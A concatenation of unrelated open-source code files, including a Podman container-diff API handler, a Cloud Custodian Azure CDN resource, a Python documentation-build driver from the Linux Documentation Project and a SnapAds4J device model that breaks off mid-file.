      <LoginPage user={user} redirect={redirect} requiredRoles={location.state ? location.state.requiredRoles : []} />
    );
  }
}

// Expose the logged-in user from the account slice of the store.
function mapStateToProps(state: Object): {user: Object} {
  return {
    user: state.account.user,
  };
}

// Bundle every action creator under a single `Actions` prop.
function mapDispatchToProps(dispatch: Function): {Actions: Object} {
  return {Actions: bindActionCreators(ActionCreators, dispatch)};
}

export default connect(mapStateToProps, mapDispatchToProps)(LoginPageContainer);
|
al3pht/cloud-custodian
|
tools/c7n_azure/c7n_azure/resources/cdn.py
|
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
from c7n_azure.provider import resources
from c7n_azure.resources.arm import ArmResourceManager
@resources.register('cdnprofile')
class CdnProfile(ArmResourceManager):
    """CDN Resource

    :example:

    Returns all CDNs with Standard_Verizon sku

    .. code-block:: yaml

        policies:
          - name: standard-verizon
            resource: azure.cdnprofile
            filters:
              - type: value
                key: sku
                op: in
                value_type: normalize
                value: Standard_Verizon
    """

    class resource_type(ArmResourceManager.resource_type):
        # Grouping used by the generated provider documentation.
        doc_groups = ['Media']

        # Azure SDK module/client used to enumerate CDN profiles.
        service = 'azure.mgmt.cdn'
        client = 'CdnManagementClient'
        enum_spec = ('profiles', 'list', None)
        # Columns included in c7n report output.
        default_report_fields = (
            'name',
            'location',
            'resourceGroup',
            'sku.name'
        )
        resource_type = 'Microsoft.Cdn/profiles'
|
fredr/podman
|
pkg/api/handlers/compat/changes.go
|
package compat
import (
"net/http"
"github.com/containers/podman/v3/libpod"
"github.com/containers/podman/v3/libpod/define"
"github.com/containers/podman/v3/pkg/api/handlers/utils"
api "github.com/containers/podman/v3/pkg/api/types"
"github.com/gorilla/schema"
"github.com/pkg/errors"
)
// Changes is the Docker-compatible handler that returns the filesystem diff
// of a container or image as JSON.
func Changes(w http.ResponseWriter, r *http.Request) {
	decoder := r.Context().Value(api.DecoderKey).(*schema.Decoder)
	runtime := r.Context().Value(api.RuntimeKey).(*libpod.Runtime)

	// Optional query parameters: a parent object to diff against and the
	// kind of object being diffed.
	query := struct {
		Parent   string `schema:"parent"`
		DiffType string `schema:"diffType"`
	}{}
	if err := decoder.Decode(&query, r.URL.Query()); err != nil {
		utils.Error(w, "Something went wrong.", http.StatusBadRequest, errors.Wrapf(err, "failed to parse parameters for %s", r.URL.String()))
		return
	}

	// Map the string parameter onto libpod's DiffType; empty means "all".
	var diffType define.DiffType
	switch query.DiffType {
	case "", "all":
		diffType = define.DiffAll
	case "container":
		diffType = define.DiffContainer
	case "image":
		diffType = define.DiffImage
	default:
		utils.Error(w, "Something went wrong.", http.StatusBadRequest, errors.Errorf("invalid diffType value %q", query.DiffType))
		return
	}

	id := utils.GetName(r)
	changes, err := runtime.GetDiff(query.Parent, id, diffType)
	if err != nil {
		utils.InternalServerError(w, err)
		return
	}
	utils.WriteJSON(w, 200, changes)
}
|
sterglee/KotlinLabSimple
|
src/edu/emory/mathcs/csparsej/tdouble/Dcs_leaf.java
|
/* ***** BEGIN LICENSE BLOCK *****
*
* CSparse: a Concise Sparse matrix package.
* Copyright (c) 2006, <NAME>.
* http://www.cise.ufl.edu/research/sparse/CSparse
*
* -------------------------------------------------------------------------
*
* CSparseJ is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* CSparseJ is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this Module; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
* ***** END LICENSE BLOCK ***** */
package edu.emory.mathcs.csparsej.tdouble;
/**
* Determine if j is a leaf of the skeleton matrix and find lowest common
* ancestor (lca).
*
* @author <NAME> (<EMAIL>)
*
*/
public class Dcs_leaf {
/**
* Determines if j is a leaf of the skeleton matrix and find lowest common
* ancestor (lca).
*
* @param i
* @param j
* @param first
* @param first_offset
* @param maxfirst
* @param maxfirst_offset
* @param prevleaf
* @param prevleaf_offset
* @param ancestor
* @param ancestor_offset
* @param jleaf
* @return lca(jprev,j)
*/
    public static int cs_leaf(int i, int j, int[] first, int first_offset, int[] maxfirst, int maxfirst_offset,
            int[] prevleaf, int prevleaf_offset, int[] ancestor, int ancestor_offset, int[] jleaf) {
        int q, s, sparent, jprev;
        // Guard against missing workspaces; -1 signals an error to the caller.
        if (first == null || maxfirst == null || prevleaf == null || ancestor == null || jleaf == null)
            return (-1);
        jleaf[0] = 0;
        if (i <= j || first[first_offset + j] <= maxfirst[maxfirst_offset + i])
            return (-1); /* j not a leaf */
        maxfirst[maxfirst_offset + i] = first[first_offset + j]; /* update max first[j] seen so far */
        jprev = prevleaf[prevleaf_offset + i]; /* jprev = previous leaf of ith subtree */
        prevleaf[prevleaf_offset + i] = j;
        jleaf[0] = (jprev == -1) ? 1 : 2; /* j is first or subsequent leaf */
        if (jleaf[0] == 1)
            return (i); /* if 1st leaf, q = root of ith subtree */
        // Follow the ancestor chain from jprev up to its current root q.
        for (q = jprev; q != ancestor[ancestor_offset + q]; q = ancestor[ancestor_offset + q])
            ;
        for (s = jprev; s != q; s = sparent) {
            sparent = ancestor[ancestor_offset + s]; /* path compression */
            ancestor[ancestor_offset + s] = q;
        }
        return (q); /* q = least common ancestor (jprev,j) */
    }
}
|
designpatterns2/Symetrical-Information---Observer
|
src/net/sf/bloodball/model/player/ExtraMoveMode.java
|
<reponame>designpatterns2/Symetrical-Information---Observer
package net.sf.bloodball.model.player;
import net.sf.bloodball.util.Dices;
/**
 * Move mode granting two move squares, where each move carries an injury
 * risk resolved by a D6 roll.
 */
public class ExtraMoveMode extends MoveMode {

    public ExtraMoveMode(Player player) {
        super(player);
    }

    /** Injures the player on a D6 roll of 6 (one-in-six risk per move). */
    public void checkForInjury() {
        if (Dices.D6.roll() == 6) {
            getPlayer().injure(Health.INJURED);
        }
    }

    /** @return the number of move squares available in this mode */
    protected int getMoveSquares() {
        return 2;
    }

    /** @return the mode that follows once the extra moves are spent */
    protected MoveMode getSuccessor() {
        return new NoMoveMode(getPlayer());
    }

    /** Rolls for injury, then performs the normal move. */
    public void move() {
        checkForInjury();
        super.move();
    }
}
|
toolisticon/byoct-jpa
|
src/test/resources/testcases/convertsprocessor/type/testclass/TestcaseValidUsage.java
|
package io.toolisticon.byoct.jpa.convertsprocessor.testclass;
import javax.persistence.Converts;
@Converts(value={@javax.persistence.Convert()})
public class TestcaseValidUsage {
}
|
rosea-tf/surreal
|
surreal/tests/components/test_neg_log_likelihood_loss.py
|
<reponame>rosea-tf/surreal
# Copyright 2019 ducandu GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
import scipy.stats as sts
import unittest
from surreal.components.loss_functions.neg_log_likelihood_loss import NegLogLikelihoodLoss
from surreal.spaces import *
from surreal.spaces.space_utils import get_default_distribution_from_space
from surreal.tests.test_util import check
from surreal.utils.numpy import softmax
class TestSupervisedLossFunctions(unittest.TestCase):
def test_neg_log_likelihood_loss_function_w_simple_space(self):
shape = (5, 4, 3)
parameters_space = Tuple(Float(shape=shape), Float(shape=shape), main_axes="B")
labels_space = Float(shape=shape, main_axes="B")
loss_function = NegLogLikelihoodLoss(distribution=get_default_distribution_from_space(labels_space))
parameters = parameters_space.sample(10)
# Make sure stddev params are not too crazy (just like our adapters do clipping for the raw NN output).
parameters = (parameters[0], np.clip(parameters[1], 0.1, 1.0))
labels = labels_space.sample(10)
expected_loss_per_item = np.sum(-np.log(sts.norm.pdf(labels, parameters[0], parameters[1])), axis=(-1, -2, -3))
out = loss_function(parameters, labels)
check(out, expected_loss_per_item, decimals=4)
def test_neg_log_likelihood_loss_function_w_container_space(self):
parameters_space = Dict({
# Make sure stddev params are not too crazy (just like our adapters do clipping for the raw NN output).
"a": Tuple(Float(shape=(2, 3)), Float(0.5, 1.0, shape=(2, 3))), # normal (0.0 to 1.0)
"b": Float(shape=(4,), low=-1.0, high=1.0) # 4-discrete
}, main_axes="B")
labels_space = Dict({
"a": Float(shape=(2, 3)),
"b": Int(4)
}, main_axes="B")
loss_function = NegLogLikelihoodLoss(distribution=get_default_distribution_from_space(labels_space))
parameters = parameters_space.sample(2)
# Softmax the discrete params.
probs_b = softmax(parameters["b"])
# probs_b = parameters["b"]
labels = labels_space.sample(2)
# Expected loss: Sum of all -log(llh)
log_prob_per_item_a = np.sum(np.log(sts.norm.pdf(labels["a"], parameters["a"][0], parameters["a"][1])),
axis=(-1, -2))
log_prob_per_item_b = np.array([np.log(probs_b[0][labels["b"][0]]), np.log(probs_b[1][labels["b"][1]])])
expected_loss_per_item = -(log_prob_per_item_a + log_prob_per_item_b)
out = loss_function(parameters, labels)
check(out, expected_loss_per_item, decimals=4)
|
ddeka2910/python-tldp
|
tldp/driver.py
|
<reponame>ddeka2910/python-tldp
#! /usr/bin/python
# -*- coding: utf8 -*-
#
# Copyright (c) 2016 Linux Documentation Project
from __future__ import absolute_import, division, print_function
from __future__ import unicode_literals
import os
import sys
import errno
import signal
import shutil
import logging
import inspect
import collections
from argparse import Namespace
from tldp.typeguesser import knowndoctypes
from tldp.sources import SourceDocument, arg_issourcedoc
from tldp.outputs import OutputDirectory
from tldp.inventory import Inventory, status_classes, status_types, stypes
from tldp.config import collectconfiguration
from tldp.utils import arg_isloglevel, arg_isdirectory
from tldp.utils import swapdirs, sameFilesystem
from tldp.doctypes.common import preamble, postamble
# -- Don't freak out with IOError when our STDOUT, handled with
# head, sed, awk, grep, etc; and, also deal with a user's ctrl-C
# the same way (i.e. no traceback, just stop)
#
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
logformat = '%(levelname)-9s %(name)s %(filename)s#%(lineno)s ' \
+ '%(funcName)s %(message)s'
logging.basicConfig(stream=sys.stderr, format=logformat, level=logging.ERROR)
logger = logging.getLogger(__name__)
# -- short names
#
opa = os.path.abspath
opb = os.path.basename
opd = os.path.dirname
opj = os.path.join
# -- error message prefixes
#
ERR_NEEDPUBDIR = "Option --pubdir (and --sourcedir) required "
ERR_NEEDSOURCEDIR = "Option --sourcedir (and --pubdir) required "
ERR_UNKNOWNARGS = "Unknown arguments received: "
ERR_EXTRAARGS = "Extra arguments received: "
def show_doctypes(config, *args, **kwargs):
if args:
return ERR_EXTRAARGS + ' '.join(args)
file = kwargs.get('file', sys.stdout)
print("Supported source document types:", file=file)
print('', file=file)
for doctype in knowndoctypes:
classname = doctype.__name__
fname = os.path.abspath(inspect.getmodule(doctype).__file__)
extensions = ', '.join(doctype.extensions)
print('{}'.format(classname), file=file)
print(' format name: {}'.format(doctype.formatname), file=file)
print(' code location: {}'.format(fname), file=file)
print(' file extensions: {}'.format(extensions), file=file)
for signature in doctype.signatures:
print(' signature: {}'.format(signature), file=file)
print('', file=file)
print('', file=file)
return os.EX_OK
def show_statustypes(config, *args, **kwargs):
if args:
return ERR_EXTRAARGS + ' '.join(args)
file = kwargs.get('file', sys.stdout)
width = 2 + max([len(x) for x in status_types])
print("Basic status types:", file=file)
print('', file=file)
for status, descrip in stypes.items():
fmt = '{status:>{width}}: {descrip}'
text = fmt.format(status=status, descrip=descrip, width=width)
print(text, file=file)
print('', file=file)
print("Synonyms and groups:", file=file)
print('', file=file)
for status, descrip in status_classes.items():
fmt = '{status:>{width}}: {descrip}'
descrip = ', '.join(descrip)
text = fmt.format(status=status, descrip=descrip, width=width)
print(text, file=file)
print('', file=file)
return os.EX_OK
def summary(config, *args, **kwargs):
    '''print an inventory summary grouped by document status and by doctype

    Requires both config.pubdir and config.sourcedir; returns os.EX_OK on
    success or an error-message string otherwise.
    '''
    if args:
        return ERR_EXTRAARGS + ' '.join(args)
    if not config.pubdir:
        return ERR_NEEDPUBDIR + "for --summary"
    if not config.sourcedir:
        return ERR_NEEDSOURCEDIR + "for --summary"
    file = kwargs.get('file', sys.stdout)
    inv = kwargs.get('inv', None)
    if inv is None:
        inv = Inventory(config.pubdir, config.sourcedir)
    # Column widths for the aligned report.
    width = Namespace()
    width.doctype = max([len(x.__name__) for x in knowndoctypes])
    width.status = max([len(x) for x in status_types])
    width.count = len(str(len(inv.source.keys())))
    print('By Document Status (STATUS)', '---------------------------',
          sep='\n', file=file)
    for status in status_types:
        count = len(getattr(inv, status, 0))
        s = '{0:{w.status}} {1:{w.count}} '.format(status, count, w=width)
        print(s, end="", file=file)
        if config.verbose:
            print(', '.join(getattr(inv, status).keys()), file=file)
        else:
            # BUG FIX: on Python 3, dict.keys() returns a view which has no
            # pop(); materialize a list so the abbreviation loop works on
            # both Python 2 and 3.
            abbrev = list(getattr(inv, status).keys())
            s = ''
            if abbrev:
                s = s + abbrev.pop(0)
            while abbrev:
                if (len(s) + len(abbrev[0])) > 48:
                    break
                s = s + ', ' + abbrev.pop(0)
            if abbrev:
                s = s + ', and %d more ...' % (len(abbrev))
            print(s, file=file)
    print('', 'By Document Type (DOCTYPE)', '--------------------------',
          sep='\n', file=file)
    summarybytype = collections.defaultdict(list)
    for doc in inv.source.values():
        name = doc.doctype.__name__
        summarybytype[name].append(doc.stem)
    for doctype, docs in summarybytype.items():
        count = len(docs)
        s = '{0:{w.doctype}} {1:{w.count}} '.format(doctype, count, w=width)
        print(s, end="", file=file)
        if config.verbose:
            print(', '.join(docs), file=file)
        else:
            # Copy so popping does not mutate summarybytype's stored list.
            abbrev = list(docs)
            s = ''
            if abbrev:
                s = s + abbrev.pop(0)
            while abbrev:
                if (len(s) + len(abbrev[0])) > 36:
                    break
                s = s + ', ' + abbrev.pop(0)
            if abbrev:
                s = s + ', and %d more ...' % (len(abbrev))
            print(s, file=file)
    print('', file=file)
    return os.EX_OK
def detail(config, docs, **kwargs):
file = kwargs.get('file', sys.stdout)
width = Namespace()
width.doctype = max([len(x.__name__) for x in knowndoctypes])
width.status = max([len(x) for x in status_types])
width.stem = max([len(x.stem) for x in docs])
# -- if user just said "list" with no args, then give the user something
# sane, "all"; it would make sense for this to be "work", too, but
# "all" seems to be less surprising
#
for doc in docs:
doc.detail(width, config.verbose, file=file)
return os.EX_OK
def removeOrphans(docs):
    '''return only the documents that have a source; log and drop orphans'''
    kept = list()
    total = len(docs)
    for num, doc in enumerate(docs, 1):
        if isinstance(doc, SourceDocument):
            kept.append(doc)
        else:
            logger.info("%s (%d of %d) removing: no source for orphan",
                        doc.stem, num, total)
    return kept
def removeUnknownDoctypes(docs):
    '''return only the documents whose doctype was identified; log the rest'''
    kept = list()
    total = len(docs)
    for num, doc in enumerate(docs, 1):
        if doc.doctype:
            kept.append(doc)
        else:
            logger.info("%s (%d of %d) removing: unknown doctype",
                        doc.stem, num, total)
    return kept
def createBuildDirectory(d):
    '''ensure directory d exists; return (True, d) or (False, errno)'''
    if arg_isdirectory(d):
        return True, d
    logger.debug("Creating build directory %s.", d)
    try:
        os.mkdir(d)
    except OSError as e:
        logger.critical("Could not make --builddir %s.", d)
        return False, e.errno
    return True, d
def builddir_setup(config):
'''create --builddir; ensure it shares a filesystem with --pubdir'''
if not config.builddir:
builddir = opj(opd(opa(config.pubdir)), 'ldptool-build')
ready, error = createBuildDirectory(builddir)
if not ready:
return ready, error
config.builddir = builddir
if not sameFilesystem(config.pubdir, config.builddir):
return False, "--pubdir and --builddir must be on the same filesystem"
return True, None
def create_dtworkingdir(config, docs):
for source in docs:
classname = source.doctype.__name__
source.dtworkingdir = opj(config.builddir, classname)
ready, error = createBuildDirectory(source.dtworkingdir)
if not ready:
return ready, error
return True, None
def post_publish_cleanup(workingdirs):
'''clean up empty directories left under --builddir'''
for d in workingdirs:
if os.path.isdir(d):
try:
logger.debug("removing build dir %s", d)
os.rmdir(d)
except OSError as e:
if e.errno != errno.ENOTEMPTY:
raise
logger.debug("Could not remove %s; files still present", d)
def prepare_docs_script_mode(config, docs):
for source in docs:
if not source.output:
fromsource = OutputDirectory.fromsource
if not config.pubdir:
source.working = fromsource(source.dirname, source)
else:
source.working = fromsource(config.pubdir, source)
else:
source.working = source.output
return True, None
def prepare_docs_build_mode(config, docs):
ready, error = create_dtworkingdir(config, docs)
if not ready:
return ready, error
for source in docs:
d = source.dtworkingdir
source.working = OutputDirectory.fromsource(d, source)
if not source.output:
source.output = OutputDirectory.fromsource(config.pubdir, source)
return True, None
def docbuild(config, docs, **kwargs):
    """Run each document's doctype generator against its working directory.

    Returns (all_succeeded, list of (result, doc) pairs).
    N.B. all([]) is True, so an empty docs list counts as success.
    """
    buildsuccess = False
    result = list()
    for x, source in enumerate(docs, 1):
        working = source.working
        runner = source.doctype(source=source, output=working, config=config)
        # Progress counts reflect documents completed so far, not this one.
        status = 'progress, %d failures, %d successes'
        status = status % (result.count(False), result.count(True),)
        logger.info("%s (%d of %d) initiating build [%s]",
                    source.stem, x, len(docs), status)
        result.append(runner.generate(**kwargs))
    if all(result):
        buildsuccess = True
    return buildsuccess, list(zip(result, docs))
def script(config, docs, **kwargs):
    """--script action: emit a shell script (preamble, per-document build
    commands, postamble) to kwargs['file'] (default sys.stdout).

    Returns os.EX_OK on success or an error string on failure.
    """
    ready, error = prepare_docs_script_mode(config, docs)
    if not ready:
        return error
    file = kwargs.get('file', sys.stdout)
    print(preamble, file=file)
    buildsuccess, results = docbuild(config, docs, **kwargs)
    print(postamble, file=file)
    for errcode, source in results:
        if not errcode:
            logger.error("Could not generate script for %s", source.stem)
    if buildsuccess:
        return os.EX_OK
    else:
        return "Script generation failed."
def build(config, docs, **kwargs):
    """--build action: set up --builddir, prepare documents, and run
    their generators; log per-document success/failure.

    Returns os.EX_OK on success or an error string on failure.
    """
    if not config.pubdir:
        return ERR_NEEDPUBDIR + "to --build"
    ready, error = builddir_setup(config)
    if not ready:
        return error
    ready, error = prepare_docs_build_mode(config, docs)
    if not ready:
        return error
    buildsuccess, results = docbuild(config, docs, **kwargs)
    for x, (buildcode, source) in enumerate(results, 1):
        if buildcode:
            logger.info("success (%d of %d) available in %s",
                        x, len(results), source.working.dirname)
        else:
            logger.info("FAILURE (%d of %d) available in %s",
                        x, len(results), source.working.dirname)
    if buildsuccess:
        return os.EX_OK
    else:
        return "Build failed, see logging output in %s." % (config.builddir,)
def publish(config, docs, **kwargs):
    """--publish action: build everything, then atomically swap each
    document's working directory into its output location and clean up
    the build area.

    Returns os.EX_OK on success or propagates build()'s error value.
    """
    # publish implies build
    config.build = True
    result = build(config, docs, **kwargs)
    if result != os.EX_OK:
        return result
    for x, source in enumerate(docs, 1):
        logger.info("Publishing (%d of %d) to %s.",
                    x, len(docs), source.output.dirname)
        # -- swapdirs must raise an error if there are problems
        #
        swapdirs(source.working.dirname, source.output.dirname)
        # After the swap, the working path holds the OLD published tree.
        if os.path.isdir(source.working.dirname):
            logger.debug("%s removing old directory %s",
                         source.stem, source.working.dirname)
            shutil.rmtree(source.working.dirname)
    # Remove the now-empty per-doctype dirs, then --builddir itself.
    workingdirs = list(set([x.dtworkingdir for x in docs]))
    workingdirs.append(config.builddir)
    post_publish_cleanup(workingdirs)
    return os.EX_OK
def getDocumentNames(args):
    """Split args into (set of resolved source-document paths, set of
    args that did not name a source document on disk)."""
    resolved = [arg_issourcedoc(arg) for arg in args]
    remainder = set(arg for doc, arg in zip(resolved, args) if not doc)
    return set(filter(None, resolved)), remainder
def getStatusNames(args):
    """Split args into (set of status names from matching status
    classes, set of args that are not status-class names)."""
    matched = set()
    stati = set()
    for name in args:
        classes = status_classes.get(name, None)
        if classes:
            stati.update(classes)
            matched.add(name)
    return stati, set(args) - matched
def getDocumentClasses(args):
    """Split args into (set of matching doctype classes, set of args that
    do not name a known doctype); matching is case-insensitive.

    BUG FIX: the original zipped the per-doctype match list (one entry per
    entry of knowndoctypes) against args, so remainder membership depended
    on list POSITION — an arg matching a later doctype could appear in both
    sought and remainder.  Remainder is now computed from the matched class
    names themselves.
    """
    largs = [x.lower() for x in args]
    sought = set(cls for cls in knowndoctypes if cls.__name__.lower() in largs)
    matchednames = set(cls.__name__.lower() for cls in sought)
    remainder = set(arg for arg in args if arg.lower() not in matchednames)
    return sought, remainder
def getDocumentsByStems(docs, args):
sought = set()
for doc in docs:
if doc.stem in args:
sought.add(doc)
soughtstems = [x.stem for x in sought]
remainder = set(args).difference(soughtstems)
return sought, remainder
def getDocumentsByStatus(docs, stati):
sought = set()
for doc in docs:
if doc.status in stati:
sought.add(doc)
return sought
def processSkips(config, docs):
    """Partition docs into (included, excluded) according to config.skip,
    which may contain status-class names, doctype names, or stems.

    Skip precedence per document: doctype, then status, then stem.
    """
    included = set()
    excluded = set()
    # Anything in config.skip that is not a status class is tried as a
    # doctype name; anything left after that is treated as a stem.
    skip_stati, remainder = getStatusNames(config.skip)
    skip_doctypes, skip_stems = getDocumentClasses(remainder)
    for doc in docs:
        stem = doc.stem
        # Output-only (orphan) entries may lack a doctype attribute.
        if hasattr(doc, 'doctype'):
            if doc.doctype in skip_doctypes:
                logger.info("%s skipping doctype %s", stem, doc.doctype)
                excluded.add(doc)
                continue
        if doc.status in skip_stati:
            logger.info("%s skipping status %s", stem, doc.status)
            excluded.add(doc)
            continue
        if doc.stem in skip_stems:
            logger.info("%s skipping stem %s", stem, stem)
            excluded.add(doc)
            continue
        included.add(doc)
    return included, excluded
def extractExplicitDocumentArgs(config, args):
    """Return (set of SourceDocuments for args that name files on disk,
    set of remaining args); config is unused but kept for signature
    parity with the other collectors."""
    rawdocs, remainder = getDocumentNames(args)
    logger.debug("args included %d documents in filesystem: %r",
                 len(rawdocs), rawdocs)
    docs = set(SourceDocument(doc) for doc in rawdocs)
    return docs, remainder
def collectWorkset(config, args):
    """Resolve CLI args (explicit files, status-class names, stems) into
    a sorted list of documents to operate on.

    Returns (docs, None) on success or (None, error_string) on failure.
    """
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    # -- argument handling logic; try to avoid creating an inventory unless it
    #    is necessary
    #
    workset, remainder = extractExplicitDocumentArgs(config, args)
    stati, remainder = getStatusNames(remainder)
    if len(workset):
        logger.info("Added %d explicit file paths from args.", len(workset))
    need_inventory = False
    if remainder or stati:
        need_inventory = True
    if not workset:
        need_inventory = True
    # -- We only --list, --script, --build, or --publish on work-to-be-done
    #    so, if there have been no special arguments at this point, we will
    #    simply grab the work to be done; see below the line that says:
    #
    #      docs = inv.work.values()
    #
    # -- also make one last check to see that config.pubdir and
    #    config.sourcedir are set appropriately; just before creating an
    #    Inventory
    #
    if need_inventory:
        if not config.pubdir:
            return None, ERR_NEEDPUBDIR + "for inventory"
        if not config.sourcedir:
            return None, ERR_NEEDSOURCEDIR + "for inventory"
        inv = Inventory(config.pubdir, config.sourcedir)
        logger.info("Inventory contains %s source and %s output documents.",
                    len(inv.source.keys()), len(inv.output.keys()))
    else:
        inv = None
    if stati:
        docs = getDocumentsByStatus(inv.all.values(), stati)
        workset.update(docs)
        if docs:
            logger.info("Added %d docs, found by status class .", len(docs))
    unknownargs = None
    if remainder:
        # Any remaining args must be stems; unknown stems are fatal.
        docs, unknownargs = getDocumentsByStems(inv.all.values(), remainder)
        workset.update(docs)
        logger.info("Added %d docs, found by stem name.", len(docs))
    if unknownargs:
        return None, ERR_UNKNOWNARGS + ' '.join(unknownargs)
    # -- without any arguments (no files, no stems, no status_classes), the
    #    default behaviour is to either --build, --list or --script any
    #    available work, i.e. documents that have status new, orphan, broken,
    #    or stale.
    #
    if not workset:
        if not stati and not remainder:
            workset.update(inv.work.values())
    # -- and, of course, apply the skipping logic
    #
    workset, _ = processSkips(config, workset)
    docs = sorted(workset, key=lambda x: x.stem.lower())
    return docs, None
def handleArgs(config, args):
    """Dispatch to the action selected in config (--doctypes,
    --statustypes, --summary, --detail, --script, --publish, --build);
    --build is the default when no action is requested.

    Returns an exit code (os.EX_OK) or an error string.
    """
    if config.doctypes:
        return show_doctypes(config, *args)
    if config.statustypes:
        return show_statustypes(config, *args)
    if config.summary:
        return summary(config, *args)
    docs, error = collectWorkset(config, args)
    if error:
        return error
    if not docs:
        logger.info("No work to do.")
        return os.EX_OK
    if config.detail:
        return detail(config, docs)
    # -- build(), script() and publish() will not be able to deal
    #    with orphans or with unknown source document types
    #
    docs = removeUnknownDoctypes(removeOrphans(docs))
    if config.script:
        return script(config, docs)
    if config.publish:
        return publish(config, docs)
    if not config.build:
        logger.info("Assuming --build, since no other action was specified...")
        config.build = True
    if config.build:
        return build(config, docs)
    return "Fell through handleArgs(); programming error."
def run(argv):
    """Parse configuration from CLI/ENV/CFG and dispatch to handleArgs();
    returns its exit code or error string."""
    # -- may want to see option parsing, so set --loglevel as
    #    soon as possible
    if '--loglevel' in argv:
        levelarg = 1 + argv.index('--loglevel')
        level = arg_isloglevel(argv[levelarg])
        # NOTE(review): if arg_isloglevel can return None for a bad value,
        # setLevel(None) would raise; confirm its contract.
        # -- set the root logger's level
        logging.getLogger().setLevel(level)
    # -- produce a configuration from CLI, ENV and CFG
    #
    tag = 'ldptool'
    config, args = collectconfiguration(tag, argv)
    # -- and reset the loglevel (after reading envar, and config)
    #
    logging.getLogger().setLevel(config.loglevel)
    logger.debug("Received the following configuration:")
    for param, value in sorted(vars(config).items()):
        logger.debug(" %s = %r", param, value)
    logger.debug(" args: %r", args)
    return handleArgs(config, args)
def main():
    """Console entry point: run with CLI args and exit with the result."""
    sys.exit(run(sys.argv[1:]))


if __name__ == '__main__':
    main()
#
# -- end of file
|
yassineazimani/SnapAds4J
|
src/main/java/snapads4j/model/device/Device.java
|
<reponame>yassineazimani/SnapAds4J
/*
* Copyright 2019 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package snapads4j.model.device;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.annotation.JsonInclude.Include;
import com.fasterxml.jackson.annotation.JsonProperty;
import lombok.Getter;
import lombok.Setter;
import lombok.ToString;
import java.util.List;
/**
* Device.
*
* @author Yassine
*/
@Getter
@Setter
@ToString
@JsonInclude(Include.NON_EMPTY)
public class Device {

    /** Targeting spec id. */
    private Long id;

    /** Connection type, e.g. "WIFI" or "CELL". */
    @JsonProperty("connection_type")
    private String connectionType;

    /** OS type, e.g. "ANDROID" or "iOS". */
    @JsonProperty("os_type")
    private String osType;

    /**
     * OS version.
     * NOTE(review): examples such as "10.3.2" cannot be represented by a
     * Double; confirm whether the API actually expects a String here.
     */
    @JsonProperty("os_version")
    private Double osVersion;

    /** Minimum OS version. */
    @JsonProperty("os_version_min")
    private Double osMinVersion;

    /** Maximum OS version. */
    @JsonProperty("os_version_max")
    private Double osMaxVersion;

    /** Carrier IDs, e.g. "US_ATT". */
    @JsonProperty("carrier_id")
    private List<String> carrierIds;

    /** Device marketing names, e.g. "Apple/iPhone 7 Plus/". */
    @JsonProperty("marketing_name")
    private List<String> marketingNames;

    /**
     * Builder for {@link Device} instances.
     *
     * @author Yassine
     */
    public static class Builder {

        private final Device deviceInstance;

        public Builder() {
            this.deviceInstance = new Device();
        } // Builder()

        /**
         * Set the targeting spec id.
         *
         * @param id the id
         * @return this builder
         */
        public Builder setId(Long id) {
            this.deviceInstance.setId(id);
            return this;
        } // setId()

        /**
         * Example : "WIFI" or "CELL"
         *
         * @param connectionType the connection type
         * @return this builder
         */
        public Builder setConnectionType(String connectionType) {
            this.deviceInstance.setConnectionType(connectionType);
            return this;
        } // setConnectionType()

        /**
         * Example : "ANDROID" or "iOS"
         *
         * @param osType the OS type
         * @return this builder
         */
        public Builder setOSType(String osType) {
            this.deviceInstance.setOsType(osType);
            return this;
        } // setOSType()

        /**
         * Example : 10.3
         *
         * @param osVersion the OS version
         * @return this builder
         */
        public Builder setOSVersion(Double osVersion) {
            this.deviceInstance.setOsVersion(osVersion);
            return this;
        } // setOSVersion()

        /**
         * Example : 10.3
         *
         * @param osVersion the minimum OS version
         * @return this builder
         */
        public Builder setOSMinVersion(Double osVersion) {
            this.deviceInstance.setOsMinVersion(osVersion);
            return this;
        } // setOSMinVersion()

        /**
         * Example : 10.3
         *
         * @param osVersion the maximum OS version
         * @return this builder
         */
        public Builder setOSMaxVersion(Double osVersion) {
            this.deviceInstance.setOsMaxVersion(osVersion);
            return this;
        } // setOSMaxVersion()

        /**
         * Example : "US_ATT"
         *
         * @param carrierIds the carrier ids
         * @return this builder
         */
        public Builder setCarrierId(List<String> carrierIds) {
            this.deviceInstance.setCarrierIds(carrierIds);
            return this;
        } // setCarrierId()

        /**
         * Example : "Apple/iPhone 7 Plus/", "Apple/iPhone 6s Plus/"
         *
         * @param marketingNames the marketing names
         * @return this builder
         * @deprecated the name is misleading (it sets marketing names, not a
         *             make); use {@link #setMarketingNames(List)} instead.
         */
        @Deprecated
        public Builder setMake(List<String> marketingNames) {
            return setMarketingNames(marketingNames);
        } // setMake()

        /**
         * Example : "Apple/iPhone 7 Plus/", "Apple/iPhone 6s Plus/"
         *
         * @param marketingNames the marketing names
         * @return this builder
         */
